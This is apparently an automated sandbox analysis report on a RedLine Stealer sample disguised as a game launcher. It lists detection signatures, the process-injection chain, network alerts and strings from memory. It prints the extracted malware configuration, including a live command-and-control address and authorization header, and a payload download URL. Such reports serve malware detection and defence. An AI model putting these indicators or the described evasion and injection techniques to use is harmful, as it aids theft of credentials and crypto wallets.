Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LiquidBounceLauncher.exe

Overview

General Information

Sample Name:LiquidBounceLauncher.exe
Analysis ID:632538
MD5:8aaeb1206b0ba5bc0d7697148509a3be
SHA1:901683aa4bdef5527b69484de7a91a30e91348f0
SHA256:61993e08ea08b735c8966bea3c2cab4dbd2c62ccd1ad88ec42c59e1a9a8f8c71
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • LiquidBounceLauncher.exe (PID: 3368 cmdline: "C:\Users\user\Desktop\LiquidBounceLauncher.exe" MD5: 8AAEB1206B0BA5BC0D7697148509A3BE)
    • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AppLaunch.exe (PID: 4616 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • Tempsvchost.exe (PID: 6588 cmdline: "C:\Users\user\AppData\Local\Tempsvchost.exe" MD5: 6B59710C6032C24A28D5E09424978125)
        • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AppLaunch.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.106.92.73:34437"], "Bot Id": "", "Authorization Header": "3735c25e5f9d7ebba04764842edf761c"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Tempsvchost.exe_47485259fa2fe91b22eefff99ee659f6163bac7_70cd5a86_1b5f7a5c\Report.werSUSP_WER_Suspicious_Crash_DirectoryDetects a crashed application executed in a suspicious directoryFlorian Roth
    • 0x116:$a1: ReportIdentifier=
    • 0x198:$a1: ReportIdentifier=
    • 0x654:$a2: .Name=Fault Module Name
    • 0x2924:$a3: AppPath=
    • 0x2924:$l4: AppPath=C:\Users\
    • 0x2924:$s8: AppPath=C:\Users\user\AppData\Local\Tempsvchost.exe

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000000.263225019.00000000004B7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.AppLaunch.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                4.2.AppLaunch.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  4.2.AppLaunch.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xd20:$pat14: , CommandLine:
                  • 0x13301:$v2_1: ListOfProcesses
                  • 0x130c1:$v4_3: base64str
                  • 0x13cea:$v4_4: stringKey
                  • 0x1188b:$v4_5: BytesToStringConverted
                  • 0x10986:$v4_6: FromBase64
                  • 0x11df2:$v4_8: procName
                  • 0x1211b:$v5_1: DownloadAndExecuteUpdate
                  • 0x12f98:$v5_2: ITaskProcessor
                  • 0x12109:$v5_3: CommandLineUpdate
                  • 0x120fa:$v5_4: DownloadUpdate
                  • 0x124e3:$v5_5: FileScanning
                  • 0x11aac:$v5_7: RecordHeaderField
                  • 0x11714:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  0.3.LiquidBounceLauncher.exe.7b0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.3.LiquidBounceLauncher.exe.7b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      Click to see the 9 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.4185.106.92.7349760344372850286 05/23/22-18:54:53.473993
                      SID:2850286
                      Source Port:49760
                      Destination Port:34437
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:185.106.92.73192.168.2.434437497602850353 05/23/22-18:54:31.859728
                      SID:2850353
                      Source Port:34437
                      Destination Port:49760
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.4185.106.92.7349760344372850027 05/23/22-18:54:30.307996
                      SID:2850027
                      Source Port:49760
                      Destination Port:34437
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 4.2.AppLaunch.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.106.92.73:34437"], "Bot Id": "", "Authorization Header": "3735c25e5f9d7ebba04764842edf761c"}
                      Multi AV Scanner detection for submitted file
                      Source: LiquidBounceLauncher.exeReversingLabs: Detection: 19%
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeVirustotal: Detection: 35%Perma Link
                      Machine Learning detection for sample
                      Source: LiquidBounceLauncher.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeJoe Sandbox ML: detected
                      Source: 17.3.Tempsvchost.exe.2260000.0.unpackAvira: Label: TR/ATRAPS.Gen4
                      Source: LiquidBounceLauncher.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 176.9.247.226:443 -> 192.168.2.4:49769 version: TLS 1.2
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004291F0 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,0_2_004291F0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00428CA0 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,17_2_00428CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_005468A3 FindFirstFileExW,20_2_005468A3
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 4x nop then mov edx, dword ptr [ecx+08h]0_2_0043612A
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 4x nop then push ebp0_2_00438496
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 4x nop then sub esp, 1Ch0_2_00430760
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 4x nop then mov eax, dword ptr [ecx]0_2_00434830
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 4x nop then sub esp, 1Ch17_2_00430210
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 4x nop then push ebx17_2_00477670
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 4x nop then jmp 004720E0h17_2_004747E0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]17_2_0049E780
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 4x nop then jmp 004882D0h17_2_0048A900

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49760 -> 185.106.92.73:34437
                      Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49760 -> 185.106.92.73:34437
                      Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 185.106.92.73:34437 -> 192.168.2.4:49760
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 4.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /628a4c7f14fb9g?raw HTTP/1.1Host: dl.uploadgram.meConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 176.9.247.226 176.9.247.226
                      Source: global trafficTCP traffic: 192.168.2.4:49760 -> 185.106.92.73:34437
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.106.92.73
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: AppLaunch.exe, 00000004.00000002.360218389.000000000A3C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: AppLaunch.exe, 00000004.00000002.356781600.0000000007767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.uploadgram.me
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.rea
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: Tempsvchost.exe.4.drString found in binary or memory: http://gcc.gnu.org/bugs.html):
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
